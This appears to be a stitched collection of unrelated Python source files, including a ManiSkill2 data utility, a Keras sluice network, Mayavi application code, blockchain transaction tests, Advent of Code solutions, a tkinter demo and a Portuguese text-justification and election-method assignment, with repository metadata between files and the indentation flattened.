memory = memory[key]
if last_memory is None:
self.memory = None
elif isinstance(last_memory, (dict, list)):
last_memory.pop(key)
class DictArray(GDict):
"""
DictArray is a special GDict which requires the first dimension of all GDict-Final must be same
"""
def __init__(self, item=None, capacity=None, faster=False):
super(DictArray, self).__init__(item, faster=faster)
if item is None:
self.capacity = None
return
if capacity is not None:
self.capacity = capacity
if not faster:
self.memory = self.to_array(wrapper=False)
self.memory = self.unsqueeze(axis=0, wrapper=False) #.to_zeros(wrapper=False)
if capacity != 1:
self.memory = self.repeat(capacity, axis=0, wrapper=False)
elif self.capacity is None:
self.capacity = self._get_one_attr(self.memory, "shape")[0]
if not faster:
self.assert_shape(self.memory, self.capacity)
@classmethod
def _get_one_attr(cls, memory, attr):
# print(type(memory), attr)
if isinstance(memory, dict):
for key in memory:
if hasattr(memory[key], attr):
return getattr(memory[key], attr)
ans = cls._get_one_attr(memory[key], attr)
if ans is not None:
return ans
elif isinstance(memory, list):
for x in memory:
if hasattr(x, attr):
return getattr(x, attr)
ans = cls._get_one_attr(x, attr)
if ans is not None:
return ans
elif hasattr(memory, attr):
return getattr(memory, attr)
return None
@classmethod
def check_shape(cls, memory, capacity):
if isinstance(memory, dict):
for key in memory:
if not cls.check_shape(memory[key], capacity):
return False
elif isinstance(memory, list):
for x in memory:
if not cls.check_shape(x, capacity):
return False
elif hasattr(memory, "shape"):
return memory.shape[0] == capacity
return True
@classmethod
def assert_shape(cls, memory, capacity):
assert cls.check_shape(memory, capacity), f"The first dimension is not {capacity}!"
def sample(self, batch_size, valid_capacity=None, wrapper=True):
capacity = self.capacity if valid_capacity is None else valid_capacity
indices = np.random.randint(low=0, high=capacity, size=batch_size)
return self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=wrapper, capacity=batch_size)
def shuffle(self, valid_capacity=None, wrapper=True, in_place=True):
capacity = self.capacity if valid_capacity is None else valid_capacity
indices = shuffle(np.arange(capacity), axis=0)
# print(valid_capacity, self.capacity)
# print(np.unique(indices).shape, len(indices))
# exit(0)
# print(capacity, self.capacity)
if in_place:
# print(indices)
items = self.take(slice(0, capacity), wrapper=False)
# print(items.shape, share_memory(items['actions'], self.memory['actions']))
self.assign(indices, items)
# self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=False, capacity=self.capacity)
else:
if capacity < self.capacity:
indices = np.concatenate([indices, np.arange(self.capacity - capacity) + capacity], axis=0)
return self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=wrapper, capacity=self.capacity)
def assign(self, indices, value):
if isinstance(value, GDict):
value = value.memory
self.memory = self._assign(self.memory, indices, value)
def gather(self, axis, index, wrapper=True):
return self._recursive_do(self.memory, gather, axis=axis, index=index, wrapper=wrapper)
def to_dict_array(self):
return DictArray(self.memory, capacity=self.capacity, faster=True)
def __len__(self):
return self.capacity
class SharedGDict(GDict):
def __init__(self, gdict=None, shape=None, dtype=None, name=None):
if gdict is not None:
assert shape is None and dtype is None and name is None
assert isinstance(gdict, GDict) and gdict.is_np_all
shape = gdict.shape
dtype = gdict.dtype
nbytes = gdict.nbytes
else:
assert not (shape is None or dtype is None or name is None)
nbytes = None
self.is_new = name is None
name, self.shared_memory = self._create_shared_memory(shape, dtype, nbytes, name)
memory = self._create_np_from_memory(self.shared_memory, shape, dtype)
self.shared_shape = shape
self.shared_dtype = dtype
self.shared_name = name
super(SharedGDict, self).__init__(memory)
def _create_np_from_memory(cls, shared_memory, shape, dtype):
if isinstance(shared_memory, dict):
memory = {k: cls._create_np_from_memory(shared_memory[k], shape[k], dtype[k]) for k in shared_memory}
elif isinstance(shared_memory, list):
memory = [cls._create_np_from_memory(shared_memory[k], shape[k], dtype[k]) for k in range(len(shared_memory))]
else:
if isinstance(dtype, str):
dtype = np.dtype(dtype)
memory = np.ndarray(shape, dtype=dtype, buffer=shared_memory.buf)
return memory
def _create_shared_memory(cls, shape, dtype, nbytes, name=None):
if name is None:
# Create new shared buffer
if isinstance(nbytes, dict):
ret_name, ret_memory = {}, {}
for key in nbytes:
name_k, memory_k = cls._create_shared_memory(shape[key], dtype[key], nbytes[key], None)
ret_name[key] = name_k
ret_memory[key] = memory_k
elif isinstance(nbytes, (list, tuple)):
ret_name, ret_memory = [], []
for key in range(len(nbytes)):
name_k, memory_k = cls._create_shared_memory(shape[key], dtype[key], nbytes[key], None)
ret_name.append(name_k)
ret_memory.append(memory_k)
else:
assert is_num(nbytes), f"{nbytes}"
ret_memory = SharedMemory(size=nbytes, create=True)
ret_name = ret_memory.name
else:
ret_name = name
if isinstance(name, dict):
ret_memory = {k: cls._create_shared_memory(shape[k], dtype[k], None, name[k])[1] for k in name}
elif isinstance(name, (list, tuple)):
ret_memory = [cls._create_shared_memory(shape[k], dtype[k], None, name[k])[1] for k in range(len(name))]
else:
assert isinstance(name, str), f"{name}"
ret_memory = SharedMemory(name=name, create=False)
return ret_name, ret_memory
def get_infos(self):
return self.shared_shape, self.shared_dtype, self.shared_name
def _unlink(self):
memory = self._flatten(self.shared_memory)
if isinstance(memory, dict):
for k, v in memory.items():
v.unlink()
else:
memory.unlink()
def _close(self):
memory = self._flatten(self.shared_memory)
if isinstance(memory, dict):
for k, v in memory.items():
v.close()
elif not callable(memory):
memory.close()
def __del__(self):
self._close()
if self.is_new:
self._unlink()
def get_full_by_key(self, key):
ret = []
for name in ["shared_shape", "shared_dtype", "shared_name"]:
ret.append(self._get_item(getattr(self, name), self._process_key(key)))
return type(self)(None, *ret)
def __setitem__(self, key, value):
assert False, "Please convert to GDict or Dictarray then change the value!"
class SharedDictArray(SharedGDict, DictArray):
pass
|
haosulab/ManiSkill2-Learn
|
maniskill2_learn/utils/data/dict_array.py
|
dict_array.py
|
py
| 34,803 |
python
|
en
|
code
| 53 |
github-code
|
6
|
28900653981
|
from keras.models import *
from keras.layers import *
import keras
from dlblocks.keras_utils import allow_growth , showKerasModel
allow_growth()
from dlblocks.pyutils import env_arg
import tensorflow as tf
from Utils import Trainer
from SluiceUtils import *
class Sluice_SeqLab(Trainer):
def build_model(self):
config = self.config
embed = Embedding( self.config['vocab_size'] , self.config['embed_dim'] , mask_zero=True)
rnn_hi = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_en = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_enhi = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_hi2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_en2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_enhi2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
stitch_layer = CrossStitch()
stitch_layer.supports_masking = True
osel = OutPutSelector()
osel.supports_masking = True
def desectOut(xx):
l = xx.shape[-1]
return Lambda( lambda x : [x[ ... , :l/2 ] , x[ ... , l/2: ] ] )( xx )
def cal_cs( inp ):
x = embed(inp)
x_hi = rnn_hi( x )
# en
x = embed(inp)
x_en = rnn_en( x )
x = embed(inp)
x_enhi = rnn_enhi( x )
[ x_hi1 , x_hi2 ] = desectOut( x_hi )
[ x_en1 , x_en2 ] = desectOut( x_en )
[ x_enhi1 , x_enhi2 ] = desectOut( x_enhi )
[ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ] = stitch_layer([ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ])
x_hi = Concatenate()([ x_hi1 , x_hi2 ])
x_en = Concatenate()([ x_en1 , x_en2 ])
x_enhi = Concatenate()([ x_enhi1 , x_enhi2 ])
x_hi_p = x_hi
x_en_p = x_en
x_enhi_p = x_enhi
x_hi = rnn_hi2( x_hi )
x_en = rnn_en2( x_en )
x_enhi = rnn_enhi2( x_enhi )
[ x_hi1 , x_hi2 ] = desectOut( x_hi )
[ x_en1 , x_en2 ] = desectOut( x_en )
[ x_enhi1 , x_enhi2 ] = desectOut( x_enhi )
[ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ] = stitch_layer([ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ])
x_hi = Concatenate()([ x_hi1 , x_hi2 ])
x_en = Concatenate()([ x_en1 , x_en2 ])
x_enhi = Concatenate()([ x_enhi1 , x_enhi2 ])
x_hi = osel([ x_hi , x_hi_p ])
x_en = osel([ x_en , x_en_p ])
x_enhi = osel([ x_enhi , x_enhi_p ])
return [ x_hi , x_en, x_enhi ]
# hi
inp_hi = Input((self.config['sent_len'] , ))
# en
inp_en = Input((self.config['sent_len'] , ))
inp_enhi = Input((self.config['sent_len'] , ))
[ x_hi , _ , _ ] = cal_cs( inp_hi)
[ _ , x_en , _ ] = cal_cs( inp_en)
[ _ , _ , x_enhi ] = cal_cs( inp_enhi)
out_enhi = TimeDistributed(Dense( self.config['n_class_enhi'] , activation='softmax'))(x_enhi)
out_hi = TimeDistributed(Dense( config['n_class_hi'] , activation='softmax'))(x_hi)
out_en = TimeDistributed(Dense( config['n_class_en'] , activation='softmax'))(x_en)
self.model = Model( [inp_hi , inp_en , inp_enhi ] , [ out_hi , out_en , out_enhi ] )
Trainer.build_model( self )
# jjj
"""
config = {}
config['epochs'] = 4
config['dataset'] = "/tmp/postag_prepped.h5"
config['exp_name'] = 'pos_girnet_1l'
config['embed_dim'] = 50
config['vocab_size'] = 30003
config['nHidden'] = 100
config['sent_len'] = 150
config['n_class_en'] = 45
config['n_class_hi'] = 25
config['n_class_enhi'] = 19
model = Sluice_SeqLab( exp_location="./ttt" , config_args = config )
model.train()
"""
|
divamgupta/mtl_girnet
|
sequence_labeling/sluice.py
|
sluice.py
|
py
| 4,038 |
python
|
en
|
code
| 6 |
github-code
|
6
|
30353923791
|
from os.path import dirname
import logging
# Enthought library imports.
from traits.api import Bool
from envisage.ui.workbench.api import WorkbenchApplication
from pyface.api import AboutDialog, ImageResource, SplashScreen
# Local imports.
import mayavi.api
from mayavi.preferences.api import preference_manager
IMG_DIR = dirname(mayavi.api.__file__)
logger = logging.getLogger(__name__)
class MayaviWorkbenchApplication(WorkbenchApplication):
""" The mayavi application. """
#### MayaviWorkbenchApplication interface #################################
# Turn this off if you don't want the workbench to start a GUI
# event loop.
start_gui_event_loop = Bool(True, desc='start a GUI event loop')
#### 'IApplication' interface #############################################
# The application's globally unique Id.
id = 'mayavi_e3'
#### 'WorkbenchApplication' interface #####################################
# Branding information.
#
# The icon used on window title bars etc.
icon = ImageResource('m2.ico', search_path=[IMG_DIR])
# The name of the application (also used on window title bars etc).
name = 'Mayavi2 - The 3D data visualizer'
###########################################################################
# 'WorkbenchApplication' interface.
###########################################################################
def run(self):
""" Run the application.
This does the following:
1) Starts the application
2) Creates and opens a workbench window
3) Starts the GUI event loop (only if start_gui_event_loop is
True)
4) When the event loop terminates, stops the application
This particular method is overridden from the parent class to
allow the user to not run the gui event loop as would be
necessary when the loop is started elsewhere or when run fron
IPython.
"""
logger.debug('---------- workbench application ----------')
# Make sure the GUI has been created (so that, if required, the splash
# screen is shown).
gui = self.gui
# Start the application.
if self.start():
# Create and open the first workbench window.
window = self.workbench.create_window(
position=self.window_position, size=self.window_size
)
window.open()
# We stop the application when the workbench has exited.
self.workbench.on_trait_change(self._on_workbench_exited, 'exited')
# Start the GUI event loop if needed.
if self.start_gui_event_loop:
# THIS CALL DOES NOT RETURN UNTIL THE GUI IS CLOSED.
gui.start_event_loop()
return
######################################################################
# Non-public interface.
######################################################################
def _about_dialog_default(self):
""" Trait initializer. """
from mayavi import api
from vtk import vtkVersion
vtk_version = vtkVersion().GetVTKVersion()
about_dialog = AboutDialog(
parent = self.workbench.active_window.control,
image = ImageResource('m2_about.jpg',
search_path=[IMG_DIR]),
additions = ['Authors: Prabhu Ramachandran',
'and Gael Varoquaux',
'',
'Mayavi version %s \t - \t VTK version %s' %
(api.__version__, vtk_version)],
)
return about_dialog
def _splash_screen_default(self):
""" Trait initializer. """
if preference_manager.root.show_splash_screen:
splash_screen = SplashScreen(
image = ImageResource('m2_about.jpg',
search_path=[IMG_DIR]),
show_log_messages = True,
)
else:
splash_screen = None
return splash_screen
|
enthought/mayavi
|
mayavi/plugins/mayavi_workbench_application.py
|
mayavi_workbench_application.py
|
py
| 4,140 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
23944471661
|
import json
import pytest
from deepdiff import DeepDiff
from eth_keys.datatypes import PrivateKey
from hexbytes import HexBytes
from jsonschema import ValidationError
from web3 import Web3
from polyswarmtransaction.exceptions import InvalidKeyError, InvalidSignatureError, WrongSignatureError, \
UnsupportedTransactionError
from polyswarmtransaction.transaction import Transaction, SignedTransaction, CustomTransaction
def test_recover_when_computed(ethereum_accounts):
# Must be a string exact match
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = Transaction().sign(ethereum_accounts[0].key)
assert signed.signature == PrivateKey(ethereum_accounts[0].key).sign_msg_hash(Web3.keccak(text=json.dumps(data)))
def test_sign_transaction(ethereum_accounts):
expected = '0xed2e8602439eec57a84bb372c6de718d88d2c27f265d7c01fe59a940f9c44eb25f849639669897e376dca6b3e745f4d9667' \
'32f731b6ec20d908673ad882aeed301'
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
assert json.loads(signed.raw_transaction) == data
assert signed.signature.hex() == expected
def test_sign_customtransaction_data_body(ethereum_accounts):
expected = '0xbd112f273df4e3a7d1b97525513c41f42e737c513bad190d74eb92947869747415a857110b02a17cc37f1a0e80514efd94c' \
'e807196a90cbc88a09377faf202e200'
custom_data = {'spam': 'eggs', 'pi': 3, 'it_moves': True}
data = {
'name': 'polyswarmtransaction.transaction:CustomTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': custom_data,
}
transaction = CustomTransaction(data_body=json.dumps(custom_data))
signed = transaction.sign(ethereum_accounts[0].key)
assert json.loads(signed.raw_transaction) == data
assert signed.signature.hex() == expected
assert isinstance(signed.transaction(), CustomTransaction)
def test_recover_signed_transaction(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_parts():
signature = ('0xed2e8602439eec57a84bb372c6de718d88d2c27f265d7c01fe59a940f9c44eb25f849639669897e376dca6b3e745f4d966'
'732f731b6ec20d908673ad882aeed301')
# Must be a string exact match
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(data), signature)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_signed_output(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
signed = SignedTransaction(signed.raw_transaction, signed.signature)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_payload(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
signed = SignedTransaction(**signed.payload)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_sign_none():
transaction = Transaction()
with pytest.raises(InvalidKeyError):
transaction.sign(None)
def test_recover_empty_signature():
signed = SignedTransaction('', '')
with pytest.raises(InvalidSignatureError):
signed.ecrecover()
def test_recover_invalid_signature():
signed = SignedTransaction('', '0xaa')
with pytest.raises(InvalidSignatureError):
signed.ecrecover()
def test_recover_changed_body(ethereum_accounts):
signature = Transaction().sign(ethereum_accounts[0].key).signature
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {
'different': 'asdf'
}
}
signed = SignedTransaction(json.dumps(data), signature)
with pytest.raises(WrongSignatureError):
signed.ecrecover()
def test_recover_changed_signature(ethereum_accounts):
transaction = Transaction().sign(HexBytes(ethereum_accounts[0].key)).raw_transaction
signature = Transaction().sign(ethereum_accounts[1].key).signature
signed = SignedTransaction(transaction, signature)
with pytest.raises(WrongSignatureError):
signed.ecrecover()
def test_load_transaction_string():
signed = SignedTransaction('this is not json', bytes([0] * 65))
with pytest.raises(json.JSONDecodeError):
signed.transaction()
def test_load_transaction_schema_mismatch():
transaction = {
'name': 'polyswarmtransaction.transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(ValidationError):
signed.transaction()
def test_load_transaction_missing_module():
transaction = {
'name': 'polyswarmtransaction.no:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction_missing_class():
transaction = {
'name': 'polyswarmtransaction.transaction:NoTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction_non_transaction():
transaction = {
'name': 'polyswarmtransaction.transaction:SignedTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
with pytest.raises(UnsupportedTransactionError):
signed.transaction()
def test_load_transaction():
transaction = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = SignedTransaction(json.dumps(transaction), bytes([0] * 65))
assert isinstance(signed.transaction(), Transaction)
assert not DeepDiff(signed.transaction().data, Transaction().data, ignore_order=True)
|
polyswarm/polyswarm-transaction
|
tests/test_transaction.py
|
test_transaction.py
|
py
| 6,888 |
python
|
en
|
code
| 1 |
github-code
|
6
|
209544494
|
recipes = [3, 7]
duendes= [0, 1]
longitud=323081
#longitud=5
while len(recipes) < longitud + 10:
new = recipes[duendes[0]] + recipes[duendes[1]]
recipes += [int(c) for c in str(new)]
duende1=(duendes[0]+1+recipes[duendes[0]])%len(recipes)
duende2=(duendes[1]+1+recipes[duendes[1]])%len(recipes)
duendes= [duende1,duende2]
#print(recipes)
print("Part 1:")
print("".join(str(n) for n in recipes[longitud : longitud + 10]))
#part 2
puzzle_input =str(longitud)
recipes = [3, 7]
duendes = [0, 1]
input_found = None
while input_found is None:
actual = ''.join(str(e) for e in recipes[-len(puzzle_input) - 1 : -1])
actual2= ''.join(str(e) for e in recipes[-len(puzzle_input): -1])
#print(actual)
#print(actual2)
if actual==puzzle_input:
input_found = -len(puzzle_input) - 1
break
if actual2==puzzle_input:
input_found = -len(puzzle_input)
break
new = recipes[duendes[0]] + recipes[duendes[1]]
recipes += [int(c) for c in str(new)]
duende1=(duendes[0]+1+recipes[duendes[0]])%len(recipes)
duende2=(duendes[1]+1+recipes[duendes[1]])%len(recipes)
duendes= [duende1,duende2]
print(input_found)
print("Part 2: "+str(len(recipes) + input_found))
|
heyheycel/advent-of-code
|
2018/code_day14.py
|
code_day14.py
|
py
| 1,164 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28743291670
|
import tkinter
from turtle import right
ventana=tkinter.Tk()
ventana.title("Ventana de pruebas")
##ventana.resizable(0,0) no deja ajustar el tamaño
##ventana.iconbitmap("cualquiercosa.ico") asi se puede cambiar el icono de la aplicacion :d
ventana.geometry("500x300")
ventana.config(bg="black")
miframe=tkinter.Frame()
miframe.pack(fill="both",expand="true")
miframe.config(bg="white")
miframe.config(width="800",height="200")
miframe.config(bd=35)
miframe.config(relief="sunken")
miframe.config(cursor="pirate")
ventana=tkinter.mainloop()
##cambiar el .py por .pyw para que salga solo la ventana de la aplicacion
|
SebastianTrujillo21/tkinter_practice
|
1er_proyecto/primera.py
|
primera.py
|
py
| 633 |
python
|
es
|
code
| 0 |
github-code
|
6
|
32942155774
|
"""
COMP.CS.100 Programming 1.
Stuart Student, [email protected], student id 150360360.
Solution of task 2..
"""
def main():
num_of_days = int(input('Enter the number of days: '))
data = 0
mean = 0
counter = 0
for number in range(1, num_of_days + 1):
running_length = float(input(f'Enter day {number} running length: '))
if running_length != 0:
data = data + running_length
mean = data / num_of_days
counter = 0
else:
counter += 1
if counter < 3:
continue
else:
break
print()
if counter == 3:
print('You had too many consecutive lazy days!')
elif mean < 3:
print(f"Your running mean of {mean:.2f} km was too low!")
else:
print(f"You were persistent runner! With a mean of {mean:.2f} km.")
if __name__ == '__main__':
main()
|
hamedtea/python_assignments
|
analyzer.py
|
analyzer.py
|
py
| 925 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70879515068
|
import aoc_cj.aoc2016.day13 as d
EXAMPLE_SPACE = """
.#.####.##
..#..#...#
#....##...
###.#.###.
.##..#..#.
..##....#.
#...##.###
""".strip()
def test_is_wall():
lines = EXAMPLE_SPACE.splitlines()
fav_num = 10
for y in range(len(lines)):
for x in range(len(lines[0])):
assert lines[y][x] == "." if d.is_open(x, y, fav_num) else "#"
def test_a():
assert d.parta("10", target_pos=(7, 4)) == 11
|
cj81499/advent-of-code
|
tests/aoc2016/y2016d13_test.py
|
y2016d13_test.py
|
py
| 433 |
python
|
en
|
code
| 2 |
github-code
|
6
|
18242919824
|
# Justificação de textos
def limpa_texto(texto):
'''Elimina espaços do texto original.
Sem dependências
Parametros: str
Retorna: str
'''
return ' '.join(texto.split())
def corta_texto(texto, largura):
'''Divide o texto pela ultima palavra completa em função da largura.
Sem depenências
Parametros: str, int
Retorna: (str,str)
'''
palavras = texto.split()
len_total = 0
i = 0
# Econtrar a última palavra completa contida pela largura desejada
for i, palavra in enumerate(palavras):
len_total += len(palavra)
if largura < len_total:
break
# Contar com o espaço entre palavras
len_total += 1
if len(texto) <= largura:
i += 1
return ' '.join(palavras[:i]), ' '.join(palavras[i:])
def insere_espacos(texto, largura):
'''Preenche a string com espaços em função da largura.
Sem dependências
Parametros: str, int
Retorna: str
'''
palavras = texto.split()
# numero_espacos -> numero de vezes que duas palavras devem ser separadas
# espaco_para_preencher -> numero de caracteres vazios necessários
numero_espacos = len(palavras)-1
espaco_para_preencher = largura - (len(texto)-numero_espacos)
if len(palavras) > 1:
espaco_default = espaco_para_preencher // numero_espacos
espacos_restantes = espaco_para_preencher - (numero_espacos * espaco_default)
mapa_espacos = [espaco_default] * numero_espacos
for i in range(espacos_restantes):
mapa_espacos[i] += 1
palavra_final = ''
for i, palavra in enumerate(palavras):
if i < numero_espacos:
palavra_final += palavra + ' '*mapa_espacos[i]
else:
palavra_final += palavra
return palavra_final
else:
# Se apenas existe uma palavra, adicionar os espaços correspondentes no final
return texto + ' '*espaco_para_preencher
def justifica_texto(texto, largura):
'''Justifica uma string com a largura expecificada.
Depende de: limpa_texto(), corta_texto(), insere_espacos(),
Parametros: str, int
Retorna: tuple
'''
if type(texto) != str or type(largura) != int or len(texto) == 0\
or largura <= 0 or not(all(len(palavra) <= largura for palavra in texto.split())):
raise ValueError('justifica_texto: argumentos invalidos')
texto_justificado = corta_texto(limpa_texto(texto), largura)
tuplo_justificado = ()
def insere_espacos_fim(txt):
espaco_para_preencher = largura - (len(txt))
return txt + ' '*espaco_para_preencher
while True:
# Verificar se é a última frase e justificar de forma diferente
if len(texto_justificado[1]) > 0:
tuplo_justificado += (insere_espacos(texto_justificado[0], largura),)
texto_justificado = texto_justificado[1]
texto_justificado = corta_texto(texto_justificado, largura)
else:
tuplo_justificado += (insere_espacos_fim(texto_justificado[0]),)
break
return tuplo_justificado
# Método de Hondt
def calcula_quocientes(votos, deputados):
'''Calcula os quocientes de cada partido segundo o Método de Hondt.
Sem dependências
Parametros: dict, int
Retorna: dict
'''
quocientes = votos.copy()
for partido, num_votos in quocientes.items():
quocientes[partido] = [float(num_votos)]
for i in range(1, deputados):
quocientes[partido].append(float(quocientes[partido][0] / (i+1)))
return quocientes
def atribui_mandatos(votos, deputados):
'''A partir do cálculo dos quocientes, ordenar os partidos
em função dos resultados obtidos nas respetivas votações.
Depende de: calcula_quocientes()
Parametros: dict, int
Retorna: list
'''
quocientes = calcula_quocientes(votos, deputados)
mandatos = list()
# Ordenar os partidos de forma crescente em função do número total de votos
# de forma a facilitar situações de empate
partidos_ordenados = dict(sorted(quocientes.items(), key=lambda votos : votos[1][0]))
while len(mandatos) < deputados:
partido_a_eleger = ('', 0)
for partido, num_votos in partidos_ordenados.items():
if num_votos[0] > partido_a_eleger[1]:
partido_a_eleger = (partido, num_votos[0])
partidos_ordenados[partido_a_eleger[0]] = partidos_ordenados[partido_a_eleger[0]][1:]
mandatos.append(partido_a_eleger[0])
return mandatos
def obtem_partidos(informacao):
'''Obtem todos os partidos que participaram nas eleições
Sem dependências
Parametros: dict
Retorna: list
'''
partidos_final = set()
for circulo in informacao.values():
for partidos in circulo['votos'].keys():
partidos_final.add(partidos)
partidos_final = sorted(partidos_final)
return partidos_final
def obtem_resultado_eleicoes(informacao):
'''Calcula os resultados das eleições
Depende de: atribui_mandatos(), obtem_partidos(),
(Indiretamente): calcula_quocientes()
Parametros: dict
Retorna: list
'''
# Verificações
if type(informacao) != dict or len(informacao) == 0:
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
for circulo in informacao.values():
if type(circulo) != dict or len(circulo) != 2\
or 'deputados' not in circulo.keys() or 'votos' not in circulo.keys()\
or type(circulo['deputados']) != int or type(circulo['votos']) != dict\
or circulo['deputados'] <= 0 or len(circulo['votos']) == 0:
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
if not all(type(nome_circulo)==str and len(nome_circulo)>0 for nome_circulo in informacao.keys()):
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
if not all(((type(votos) == int) and votos > 0 and (type(partido) == str)) for (partido, votos) in circulo['votos'].items()):
raise ValueError('obtem_resultado_eleicoes: argumento invalido')
resultados = {(partido):(partido, 0, 0) for partido in obtem_partidos(informacao)}
for circulo in informacao.values():
votos = circulo['votos']
deputados = circulo['deputados']
resultado_circulo = atribui_mandatos(votos, deputados)
for partido, num_votos in votos.items():
votos_atuais = resultados[partido][2]
deputados_atuais = resultados[partido][1]
resultados[partido] = (partido, deputados_atuais + resultado_circulo.count(partido), votos_atuais + num_votos)
resultados = list(resultados.values())
resultados = sorted(resultados, key=lambda resultado: (resultado[1],resultado[2]), reverse=True)
return resultados
# Solução de sistemas de equações
def produto_interno(t1, t2):
'''Calcula o produto interno de dois vetores.
Sem dependências
Parametros: tuple, tuple
Retorna: float
'''
return sum(float(t1[i]*t2[i]) for i in range(len(t1)))
def verifica_convergencia(matriz, constantes, solucao_atual, precisao):
'''Verifica a precisão das soluções apresentadas para
um dado sistema, representado por uma matriz e um vetor
de soluções (constantes).
Depende de: produto_interno()
Parametros: tuple, tuple, tuple, float
Retorna: bool
'''
erros = []
# Calcular o erro para cada linha da matriz aumentada
for i in range(len(constantes)):
resultado_linha = produto_interno(matriz[i], solucao_atual)
erros.append(abs(resultado_linha-constantes[i]))
return all(e<precisao for e in erros)
def retira_zeros_diagonal(matriz, constantes):
'''Retira os zeros da diagonal principal de uma
matriz efetuando trocas de linha.
Sem dependências
Parametros: tuple, tuple
Retorna: (tuple, tuple)
'''
i = 0
j = 0
n_matriz = list(matriz)
n_constantes = list(constantes)
while i < len(matriz):
while n_matriz[i][i] == 0 and j < len(n_matriz):
if n_matriz[j][i] != 0 and n_matriz[i][j] != 0:
n_matriz[i], n_matriz[j] = n_matriz[j], n_matriz[i]
n_constantes[i], n_constantes[j] = n_constantes[j], n_constantes[i]
j = 0
j += 1
i += 1
return tuple(n_matriz), tuple(n_constantes)
def eh_diagonal_dominante(matriz):
'''Verifica se uma matriz é diagonalmente dominante.
Sem dependências
Parametros: tuple
Retorna: bool
'''
linha_atual = []
for i in range(len(matriz)):
linha_atual = list(matriz[i])
elemento_diagonal = linha_atual.pop(i)
linha_atual = [abs(el) for el in linha_atual]
if abs(elemento_diagonal) < sum(linha_atual):
return False
return True
def resolve_sistema(matriz, constantes, precisao):
'''Resolve um sistema de equações lineares recorrendo ao
método de Jacobi.
Depende de: retira_zeros_diagonal(), eh_diagonal_dominante(),
verifica_convergencia(), produto_interno()
Parametros: tuple, tuple, float
Retorna: tuple
'''
# Verificacao da matriz
if type(matriz) != tuple or len(matriz)==0 or len(matriz[0]) != len(matriz):
raise ValueError('resolve_sistema: argumentos invalidos')
for linha in matriz:
if type(linha) != tuple or len(linha) != len(matriz[0]):
raise ValueError('resolve_sistema: argumentos invalidos')
else:
for valor in linha:
if (type(valor) != int and type(valor) != float):
raise ValueError('resolve_sistema: argumentos invalidos')
# Verificacao das constantes
if type(constantes) != tuple or len(constantes)==0 or len(constantes) != len(matriz):
raise ValueError('resolve_sistema: argumentos invalidos')
if not all((type(c) == int or type(c) == float) for c in constantes):
raise ValueError('resolve_sistema: argumentos invalidos')
# Verificacao da precisao
if type(precisao) != float or precisao <= 0:
raise ValueError('resolve_sistema: argumentos invalidos')
nova_matriz, novas_constantes = retira_zeros_diagonal(matriz, constantes)
# Verificacao da diagonal
if not eh_diagonal_dominante(nova_matriz):
raise ValueError('resolve_sistema: matriz nao diagonal dominante')
estimativas = [[0 for c in constantes]]
while not verifica_convergencia(nova_matriz, novas_constantes, estimativas[-1], precisao):
novas_estimativas = list()
for i in range(len(estimativas[0])):
f = produto_interno(nova_matriz[i], estimativas[-1])
nova_estimativa = estimativas[-1][i] + (novas_constantes[i] - f) / nova_matriz[i][i]
novas_estimativas.append(nova_estimativa)
